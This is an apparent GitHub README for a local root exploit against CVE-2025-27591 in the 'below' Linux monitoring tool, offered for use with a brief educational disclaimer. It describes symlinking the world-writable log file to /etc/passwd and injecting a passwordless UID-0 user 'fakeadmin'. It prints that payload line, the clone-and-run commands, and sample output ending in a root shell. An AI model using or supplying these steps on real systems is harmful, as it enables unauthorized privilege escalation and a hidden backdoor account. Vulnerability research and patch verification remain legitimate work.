🔥 Local Privilege Escalation Exploit for CVE-2025-27591 | Abuses world-writable log dir in Below to gain root via /etc/passwd injection# CVE-2025-27591 – Privilege Escalation via Symlink Abuse in `below`
[](https://github.com/00xCanelo)
[](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591)
> 🛑 **Disclaimer**: This exploit is provided **for educational and authorized security testing only**. Unauthorized use may be illegal.
---
## 🧠 Overview
`below` is a performance monitoring tool developed by Facebook for Linux systems. Versions of `below` prior to a patched release are affected by a critical vulnerability that allows **unprivileged users** to escalate to **root** by exploiting **world-writable log directories** and unsanitized log handling.
---
### 🔎 CVE Details
| Field | Value |
|------------------|------------------------------------------------|
| **CVE-ID** | [CVE-2025-27591](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591) |
| **Severity** | 🔥 Critical (CVSS ≈ 7.8 - 8.8) |
| **Attack Vector**| Local |
| **Impact** | Privilege Escalation to root (UID=0) |
| **Exploit Type** | Symlink Abuse / Log File Injection |
| **Affected App** | `below` – typically installed as `/usr/bin/below` |
| **Root Cause** | Unsafe file writes to `/var/log/below/` without permission checks |
---
## 💥 Exploit Logic
This Bash script performs the following:
1. **Check for World-Writable Directory**:
- Confirms if `/var/log/below` is world-writable (a red flag).
2. **Prepare Symlink Attack**:
- Deletes existing `error_root.log` (if any) and creates a symbolic link to `/etc/passwd`.
3. **Payload Construction**:
- Appends a fake root user to `/etc/passwd`:
```
fakeadmin::0:0:fakeadmin:/root:/bin/bash
```
4. **Trigger Logging**:
- Runs `sudo below record` to force the vulnerable binary to write logs.
5. **Gain Root Access**:
- Uses `su fakeadmin` to obtain a root shell with no password prompt.
---
## 📁 Directory Structure
```text
CVE-2025-27591/
├── exploit.sh
├── README.md
```
## ✅ Prerequisites
Before running the exploit, ensure you have the following:
- Bash shell (Linux system)
- The vulnerable binary installed: `/usr/bin/below`
- World-writable log directory: `/var/log/below`
- `sudo` privileges to execute: `sudo below record`
- Tools available:
- `ln` (to create symlinks)
- `su` (to switch users)
- `timeout` (to control execution time)
- `whoami` (for privilege check)
---
## 🚀 Exploitation Steps
```bash
# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Make the script executable
chmod +x exploit.sh
# 3. Execute the exploit
./exploit.sh
```
## 🧪 Sample Output
```bash
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view